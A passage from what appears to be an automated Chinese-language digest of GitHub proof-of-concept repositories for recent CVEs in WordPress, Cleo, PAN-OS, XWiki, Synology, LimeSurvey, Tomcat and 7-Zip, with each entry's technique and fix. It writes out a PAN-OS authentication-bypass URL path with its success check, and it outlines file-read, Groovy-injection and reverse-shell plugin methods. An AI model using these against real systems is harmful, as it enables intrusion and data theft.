该仓库提供WordPress File Upload插件的任意文件读取漏洞(CVE-2024-9047)的PoC和批量检测脚本。仓库包含一个Python脚本,用于检测目标WordPress站点是否存在该漏洞,通过构造特定的请求,尝试读取/etc/passwd文件来验证漏洞。 仓库的最新提交主要更新了README.md文件,添加了漏洞复现的链接和检测脚本的使用说明,以及更新了POC脚本,添加了版本检测功能。漏洞利用方式是构造恶意请求,通过文件包含的方式读取服务器上的任意文件,如/etc/passwd等敏感文件。如果检测到/etc/passwd文件内容,则判定漏洞存在。代码质量良好,实现了基本的功能,并提供了批量检测和单目标检测两种模式。测试用例方面,提供了对/etc/passwd文件的读取测试,可以验证漏洞的存在。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | WordPress File Upload插件存在任意文件读取漏洞 |
|
|||
|
|
| 2 | 提供批量和单目标检测脚本 |
|
|||
|
|
| 3 | 通过读取/etc/passwd文件验证漏洞 |
|
|||
|
|
| 4 | 包含版本检测功能 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理:WordPress File Upload插件存在未授权的文件读取漏洞,攻击者可以通过构造恶意请求读取服务器上的任意文件。
|
|||
|
|
|
|||
|
|
> 利用方法:使用提供的Python脚本,指定目标URL,脚本将构造特定URL请求,尝试读取/etc/passwd文件。如果成功读取文件,则表明漏洞存在。
|
|||
|
|
|
|||
|
|
> 修复方案:升级WordPress File Upload插件到安全版本,或者禁用该插件。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• WordPress
|
|||
|
|
• wp-file-upload 插件
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该漏洞影响广泛使用的WordPress插件,且提供了可用的PoC,能够直接验证漏洞。漏洞利用可导致敏感信息泄露,因此具有较高价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2024-50623 - Cleo LexiCom 远程代码执行漏洞
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2024-50623 |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 利用状态 | `漏洞利用可用` |
|
|||
|
|
| 发布时间 | 2025-04-01 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-04-01 08:50:42 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [Cleo-CVE-2024-50623-PoC](https://github.com/iSee857/Cleo-CVE-2024-50623-PoC)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了针对 Cleo LexiCom 软件的远程代码执行 (RCE) 漏洞 (CVE-2024-50623) 的 PoC 和批量检测脚本。仓库包含一个 Python 脚本 (CVE-2024-50623.py),用于检测目标 Cleo LexiCom 实例是否存在该漏洞。脚本通过构造特定的 HTTP 请求,尝试读取系统文件并上传文件。该漏洞允许攻击者在受影响的 Cleo LexiCom 系统上执行任意代码。 仓库的更新主要集中在修改 README.md 文件,增加了关于复现过程和批量检测的信息,同时,PoC脚本文件在2024-12-31 被创建, 提供了具体的漏洞检测和利用代码。
|
|||
|
|
|
|||
|
|
漏洞利用方法:
|
|||
|
|
1. 通过构造特定的HTTP请求,利用 VLSync 参数读取任意文件,例如 system.ini。
|
|||
|
|
2. 上传文件至服务器。
|
|||
|
|
3. 读取上传的文件。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | Cleo LexiCom 远程代码执行漏洞 (CVE-2024-50623) |
|
|||
|
|
| 2 | PoC 脚本用于检测和利用该漏洞 |
|
|||
|
|
| 3 | 通过 VLSync 参数实现任意文件读取和上传 |
|
|||
|
|
| 4 | 影响版本低于 5.8.0.24 的 Cleo LexiCom |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理:该漏洞源于 Cleo LexiCom 在处理 VLSync 参数时存在安全缺陷,攻击者可以构造恶意的 VLSync 请求,读取服务器上的任意文件,甚至上传恶意文件。
|
|||
|
|
|
|||
|
|
> 利用方法:使用提供的 Python 脚本,指定目标 URL,脚本将检测目标是否存在漏洞,如果存在,将尝试读取敏感文件或上传恶意文件。
|
|||
|
|
|
|||
|
|
> 修复方案:升级 Cleo LexiCom 至 5.8.0.24 或更高版本,禁用不必要的 VLSync 功能,并实施输入验证和过滤,以防止恶意请求。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Cleo LexiCom
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该漏洞允许远程代码执行,且仓库提供了可用的 PoC 代码,可以直接用于漏洞验证和利用。漏洞影响关键组件,并且具有明确的利用方法,因此具有很高的价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2025-0108 - PAN-OS身份验证绕过漏洞
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2025-0108 |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-04-01 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-04-01 08:49:03 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2025-0108-PoC](https://github.com/iSee857/CVE-2025-0108-PoC)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了Palo Alto Networks PAN-OS身份验证绕过漏洞(CVE-2025-0108)的PoC。仓库包含了批量检测脚本和单个检测脚本,通过构造特定的URL路径绕过身份验证。最近的更新主要是README.md文件的修改,包括更新博客地址和添加了批量检测的用法。其中`PanOs_CVE-2025-0108_LoginByPass.py`脚本实现了漏洞的检测功能,通过发送特定的HTTP GET请求到`/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css`路径,如果服务器返回200状态码且响应内容包含'Zero Touch Provisioning'字符串,则判断存在漏洞。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | PAN-OS身份验证绕过 |
|
|||
|
|
| 2 | 批量检测PoC |
|
|||
|
|
| 3 | 影响广泛的网络安全设备 |
|
|||
|
|
| 4 | 明确的利用方法 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理:通过构造特殊URL绕过身份验证。
|
|||
|
|
|
|||
|
|
> 利用方法:使用提供的Python脚本进行批量或单个URL检测。
|
|||
|
|
|
|||
|
|
> 修复方案:升级到修复版本。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Palo Alto Networks PAN-OS
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
漏洞影响广泛使用的网络安全设备,且提供了可用的POC,能够直接验证漏洞是否存在,并具有明确的利用方法。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2025-24893 - XWiki SolrSearchMacros RCE漏洞
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2025-24893 |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 利用状态 | `漏洞利用可用` |
|
|||
|
|
| 发布时间 | 2025-04-01 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-04-01 08:47:47 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2025-24893-PoC](https://github.com/iSee857/CVE-2025-24893-PoC)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了CVE-2025-24893 XWiki SolrSearchMacros 远程代码执行漏洞的PoC。仓库包含一个Python脚本 (CVE-2025-24893.py) 用于检测和利用此漏洞。脚本接受目标URL和Groovy命令作为输入,通过构造恶意的payload,注入Groovy代码,实现在目标服务器上执行任意命令。该漏洞利用了SolrSearchMacros组件,允许攻击者通过构造特殊请求,触发Groovy代码执行,导致RCE。PoC脚本能够直接执行命令,并且有明确的利用方法,且能判断是否成功。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | XWiki SolrSearchMacros 远程代码执行漏洞 |
|
|||
|
|
| 2 | 利用Groovy代码注入实现RCE |
|
|||
|
|
| 3 | PoC脚本提供直接的命令执行能力 |
|
|||
|
|
| 4 | 影响范围:XWiki SolrSearchMacros组件 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理:XWiki SolrSearchMacros组件存在Groovy代码注入漏洞,攻击者可以通过构造恶意payload,在SolrSearchMacros中执行Groovy代码。
|
|||
|
|
|
|||
|
|
> 利用方法:使用提供的Python脚本,指定目标URL和要执行的Groovy命令。脚本会构造payload,发送到目标XWiki服务器,触发漏洞。
|
|||
|
|
|
|||
|
|
> 修复方案:升级到修复此漏洞的XWiki版本。可以参考官方安全公告。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• XWiki SolrSearchMacros
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该漏洞属于RCE,提供了可用的PoC,可以直接用于验证和利用。影响关键组件,风险极高。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2024-10441 - Synology系统插件代码执行漏洞
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2024-10441 |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-04-01 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-04-01 08:38:07 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2024-10441](https://github.com/hazzzein/CVE-2024-10441)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了关于Synology产品中一个代码执行漏洞(CVE-2024-10441)的详细信息。该漏洞影响了BeeStation Manager (BSM), DiskStation Manager (DSM),和Unified Controller (DSMUC)。仓库中主要包含README.md文件,详细描述了漏洞的概况、影响版本、利用方法和下载链接。 最新提交更新了README.md,增加了关于漏洞的详细描述,利用方法,受影响版本,以及运行exploit的说明,并提供了下载地址。漏洞是由于在Synology系统插件守护进程中存在输出编码或转义不当引起的,允许远程攻击者通过未指定的向量执行任意代码。 利用方式是执行python脚本,指定目标IP和要执行的命令。代码质量和可用性方面,仓库中提供了利用说明,但没有直接提供完整的POC,需要下载获取,这使得评估的完整性受到限制。整体来看, 仓库提供了足够的信息来理解漏洞,但缺乏完整的POC,因此价值判断需要谨慎评估。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | Synology产品中的代码执行漏洞 |
|
|||
|
|
| 2 | 漏洞影响BeeStation Manager (BSM) 和 DiskStation Manager (DSM) |
|
|||
|
|
| 3 | 远程代码执行 |
|
|||
|
|
| 4 | 利用需要Python环境及下载的exploit.py |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理:Synology系统插件守护进程中输出编码或转义不当。
|
|||
|
|
|
|||
|
|
> 利用方法:通过运行提供的python脚本 exploit.py,指定目标IP和执行的命令。
|
|||
|
|
|
|||
|
|
> 修复方案:升级到不受影响的版本,如BSM 1.1-65374以上版本,DSM 7.2-64570-4, 7.2.1-69057-6 和 7.2.2-72806-1以上版本。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Synology BeeStation OS (BSM)
|
|||
|
|
• Synology DiskStation Manager (DSM)
|
|||
|
|
• Synology Unified Controller (DSMUC)
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该漏洞是远程代码执行漏洞,影响广泛使用的Synology产品。README.md提供了利用信息和下载链接,具备实际的利用价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### limesurvey-6.6.4-authenticated-rce - LimeSurvey 6.6.4 RCE漏洞利用
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [limesurvey-6.6.4-authenticated-rce](https://github.com/TheRedP4nther/limesurvey-6.6.4-authenticated-rce) |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 安全类型 | `漏洞利用框架` |
|
|||
|
|
| 更新类型 | `修复` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了一个针对LimeSurvey 6.6.4版本的已认证RCE漏洞的Python脚本。该脚本通过上传和激活恶意插件实现RCE。更新内容主要在于修复了登录请求的错误提示,以及修改了输出信息。这是一个典型的漏洞利用代码,可以用于安全测试和研究。该仓库整体为POC性质,实现了针对特定版本的漏洞利用。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 实现了LimeSurvey 6.6.4的认证RCE漏洞利用 |
|
|||
|
|
| 2 | 利用了恶意插件上传和激活机制 |
|
|||
|
|
| 3 | 提供了Python脚本,方便复现和测试 |
|
|||
|
|
| 4 | 漏洞利用POC |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 使用Python编写,依赖requests库进行HTTP请求。
|
|||
|
|
|
|||
|
|
> 通过上传一个恶意的插件(包含config.xml和revshell.php)来执行代码。
|
|||
|
|
|
|||
|
|
> 需要有效的LimeSurvey用户名和密码进行身份验证。
|
|||
|
|
|
|||
|
|
> 更新中修正了登录错误的提示信息。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• LimeSurvey 6.6.4
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库直接针对RCE漏洞,与关键词'RCE'高度相关,提供了可用的POC,具有较高的研究和实践价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2024-50379-PoC - Tomcat CVE-2024-50379 RCE PoC
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [CVE-2024-50379-PoC](https://github.com/iSee857/CVE-2024-50379-PoC) |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 安全类型 | `POC更新/漏洞利用` |
|
|||
|
|
| 更新类型 | `SECURITY_CRITICAL` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **4**
|
|||
|
|
- 变更文件数: **4**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了一个针对 Apache Tomcat CVE-2024-50379 漏洞的批量检测脚本。仓库包含一个Python脚本,用于检测Tomcat服务器是否存在条件竞争漏洞,该漏洞可能导致远程代码执行(RCE)。更新包括README文件的修改,增加了脚本的使用说明和图片,以及漏洞利用的参考链接。核心更新是`ApachTomcat_CVE-2024-50379_ConditionalCompetitionToRce.py`脚本,实现了对CVE-2024-50379漏洞的检测功能,通过发送构造的HTTP请求来探测目标服务器是否易受攻击。该脚本的检测过程涉及到对`/aa.Jsp`和`/bb.Jsp`的PUT请求,以及随后对`/aa.jsp`和`/bb.jsp`的GET请求,通过判断服务器返回结果来确定是否存在漏洞。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 提供CVE-2024-50379漏洞的检测脚本 |
|
|||
|
|
| 2 | 实现了针对Apache Tomcat的条件竞争漏洞检测 |
|
|||
|
|
| 3 | 包含批量检测和单个目标检测功能 |
|
|||
|
|
| 4 | 增加了使用说明和截图 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 脚本使用Python编写,利用requests库发送HTTP请求
|
|||
|
|
|
|||
|
|
> 脚本通过PUT请求创建jsp文件,并通过GET请求获取文件内容来检测漏洞
|
|||
|
|
|
|||
|
|
> 脚本支持批量检测和单个目标检测
|
|||
|
|
|
|||
|
|
> 利用条件竞争漏洞进行检测
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Apache Tomcat
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库提供了针对一个高危漏洞(CVE-2024-50379)的PoC,能够帮助安全研究人员和渗透测试人员快速验证漏洞是否存在,并评估风险。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2024-9047-PoC - WordPress文件读取漏洞PoC
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [CVE-2024-9047-PoC](https://github.com/iSee857/CVE-2024-9047-PoC) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `POC更新/漏洞利用` |
|
|||
|
|
| 更新类型 | `SECURITY_CRITICAL` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **5**
|
|||
|
|
- 变更文件数: **5**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供针对WordPress File Upload插件的CVE-2024-9047任意文件读取漏洞的批量检测脚本。仓库首先创建了PoC脚本WordPress_FileUpload(CVE-2024-9047)_ReadAnyFile.py,用于检测目标WordPress站点是否存在该漏洞,并提供了批量检测和单个URL检测的功能。更新内容包括README.md文件的修改,提供了使用说明和漏洞复现的链接。该漏洞允许攻击者读取服务器上的任意文件,可能导致敏感信息泄露,危害较高。PoC脚本通过构造特定的请求,利用插件的漏洞来读取文件。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 提供针对WordPress File Upload插件的CVE-2024-9047漏洞的PoC脚本。 |
|
|||
|
|
| 2 | 支持批量检测和单个URL检测。 |
|
|||
|
|
| 3 | 通过构造恶意请求实现任意文件读取。 |
|
|||
|
|
| 4 | 漏洞利用可能导致敏感信息泄露。 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> PoC脚本通过构造特定的HTTP请求,利用WordPress File Upload插件的漏洞。
|
|||
|
|
|
|||
|
|
> 脚本使用Python编写,依赖requests库进行HTTP请求。
|
|||
|
|
|
|||
|
|
> 脚本支持从文件读取URL列表进行批量检测,也可指定单个URL进行检测。
|
|||
|
|
|
|||
|
|
> 漏洞利用通过访问插件的特定URL,并构造参数来读取服务器上的任意文件。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• WordPress File Upload插件
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库提供了CVE-2024-9047漏洞的PoC,可以用于安全测试和漏洞评估。漏洞的利用可能导致敏感信息泄露,具有较高的安全风险。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### Cleo-CVE-2024-50623-PoC - Cleo RCE漏洞批量检测PoC
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [Cleo-CVE-2024-50623-PoC](https://github.com/iSee857/Cleo-CVE-2024-50623-PoC) |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 安全类型 | `POC更新/漏洞利用` |
|
|||
|
|
| 更新类型 | `SECURITY_CRITICAL` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **3**
|
|||
|
|
- 变更文件数: **3**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了一个针对Cleo LexiCom 远程代码执行漏洞 (CVE-2024-50623) 的批量检测脚本。 主要功能是检测目标系统是否存在该漏洞,并提供PoC。 更新内容包括新增了README.md文件, 详细介绍了漏洞复现过程和脚本的使用方法,同时提供了批量检测和单个检测的示例。 核心在于 CVE-2024-50623.py 文件,该文件实现了漏洞的检测逻辑。漏洞利用方式可能涉及构造恶意请求,触发目标系统执行任意代码。因此,检测脚本能够帮助安全研究人员快速识别和验证漏洞的存在,从而进行后续的修复或安全加固工作。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 提供针对Cleo LexiCom RCE漏洞(CVE-2024-50623)的检测脚本 |
|
|||
|
|
| 2 | 支持批量检测和单个目标检测 |
|
|||
|
|
| 3 | 包含漏洞复现过程说明 |
|
|||
|
|
| 4 | 可以检测目标系统是否存在RCE漏洞 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> Python脚本 CVE-2024-50623.py 实现了对Cleo LexiCom的RCE漏洞检测,包括HTTP请求发送和响应分析。
|
|||
|
|
|
|||
|
|
> 脚本使用 requests 库发送HTTP请求,urllib3库处理HTTPS请求忽略证书验证。
|
|||
|
|
|
|||
|
|
> 批量检测通过读取URL列表文件,单个检测允许指定目标URL。
|
|||
|
|
|
|||
|
|
> 代码中使用了正则表达式、URL解析和版本号比对等技术。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Cleo LexiCom
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库提供了针对CVE-2024-50623漏洞的PoC,可以帮助安全研究人员快速验证漏洞的存在,并进行修复和加固工作,属于高危漏洞。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2025-0411-PoC - 7-Zip MOTW绕过漏洞PoC
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [CVE-2025-0411-PoC](https://github.com/iSee857/CVE-2025-0411-PoC) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `POC更新/漏洞利用` |
|
|||
|
|
| 更新类型 | `SECURITY_CRITICAL` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **3**
|
|||
|
|
- 变更文件数: **2**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了一个针对7-Zip Mark-of-the-Web (MOTW) 绕过漏洞 (CVE-2025-0411) 的 PoC。 仓库包含了一个 C++ 源代码文件 (loader.cpp),用于演示漏洞。漏洞利用方式涉及构造恶意压缩文件,诱使用户解压并执行。更新主要是README.md的修改,添加了更多PoC资源链接。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 针对7-Zip的MOTW绕过漏洞 |
|
|||
|
|
| 2 | 提供PoC代码 |
|
|||
|
|
| 3 | 利用用户交互触发漏洞 |
|
|||
|
|
| 4 | 涉及恶意压缩文件及执行 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> C++代码(loader.cpp)用于生成可执行文件
|
|||
|
|
|
|||
|
|
> 使用MinGW-w64进行编译
|
|||
|
|
|
|||
|
|
> PoC涉及构造特制的7z压缩文件
|
|||
|
|
|
|||
|
|
> 利用7-Zip版本漏洞绕过MOTW安全机制
|
|||
|
|
|
|||
|
|
> 用户解压并执行压缩文件,触发恶意代码
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• 7-Zip
|
|||
|
|
• Windows操作系统
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库提供了CVE-2025-0411的PoC,演示了绕过MOTW的安全漏洞,可以用于安全研究和漏洞复现。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2025-0108-PoC - PAN-OS 身份验证绕过PoC
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [CVE-2025-0108-PoC](https://github.com/iSee857/CVE-2025-0108-PoC) |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 安全类型 | `漏洞利用` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **2**
|
|||
|
|
- 变更文件数: **2**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供针对Palo Alto Networks PAN-OS 身份验证绕过漏洞(CVE-2025-0108)的批量检测脚本。该漏洞允许未经身份验证的攻击者绕过身份验证机制,从而可能导致未经授权的访问。本次更新仅更新了README.md文件, 修改了博客地址为新的链接,并对批量检测的命令行参数进行了说明。该仓库代码提供了用于检测漏洞的PoC,可以帮助安全研究人员和渗透测试人员评估和验证该漏洞。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 提供针对CVE-2025-0108漏洞的PoC |
|
|||
|
|
| 2 | 实现了PAN-OS身份验证绕过的批量检测 |
|
|||
|
|
| 3 | 更新了README.md文件,包含新的PoC地址和使用说明 |
|
|||
|
|
| 4 | 允许安全研究人员验证和评估漏洞 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 脚本可能使用了特定的HTTP请求,绕过PAN-OS的身份验证机制。
|
|||
|
|
|
|||
|
|
> 批量检测实现可能通过并发方式扫描多个目标。
|
|||
|
|
|
